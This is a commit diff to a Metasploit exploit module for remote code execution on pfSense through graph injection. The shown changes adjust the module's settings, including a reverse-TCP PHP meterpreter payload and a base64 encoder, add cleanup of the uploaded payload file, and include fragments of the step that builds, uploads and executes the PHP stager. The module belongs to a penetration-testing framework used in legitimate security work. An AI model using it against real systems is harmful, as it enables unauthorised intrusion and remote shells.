changes+filedropper

Author: wetw0rk

modules/exploits/unix/http/pfsense_graph_injection_exec.rb

@@ -7,6 +7,7 @@ class MetasploitModule < Msf::Exploit::Remote
   Rank = ExcellentRanking
 
   include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::FileDropper
 
   def initialize(info = {})
     super(
@@ -33,18 +34,27 @@ def initialize(info = {})
             [ 'URL', 'http://www.security-assessment.com/files/documents/advisory/pfsenseAdvisory.pdf']
           ],
         'License'        => MSF_LICENSE,
-        'Privileged'     => true,
+        'Platform'       => 'php',
+        'Privileged'     => 'true',
         'DefaultOptions' =>
           {
-            'SSL'         => true,
-            'Encoder'     => 'php/base64',
-            'PAYLOAD'     => 'php/meterpreter/reverse_tcp',
+            'SSL'     => true,
+            'PAYLOAD' => 'php/meterpreter/reverse_tcp',
+            'Encoder' => 'php/base64'
           },
-        'DisclosureDate' => 'Apr 18, 2016',
-        'Platform'       => 'php',
-        'Arch'           => ARCH_PHP,
-        'Targets'        => [[ 'Automatic Target', { }]],
+        'Arch'           => [ ARCH_PHP ],
+        'Payload'        =>
+          {
+            'Space'  => 6000,
+            'Compat' =>
+              {
+                'Arch'           => 'php',
+                'ConnectionType' => '-bind',
+              }
+          },
+        'Targets'        => [[ 'Automatic Target', {} ]],
         'DefaultTarget'  => 0,
+        'DisclosureDate' => 'Apr 18, 2016',
       )
     )
 
@@ -115,7 +125,7 @@ def exploit
     begin
       cookie   = login
       version  = detect_version(cookie)
-      filename = rand_text_alpha(rand(10))
+      filename = rand_text_alpha(rand(1..10))
 
       # generate the PHP meterpreter payload
       stager = 'echo \'<?php '
@@ -144,6 +154,7 @@ def exploit
 
       if res && res.code == 200
         print_status('Payload uploaded successfully, executing')
+        register_file_for_cleanup(filename)
       else
         print_error('Failed to upload payload...')
       end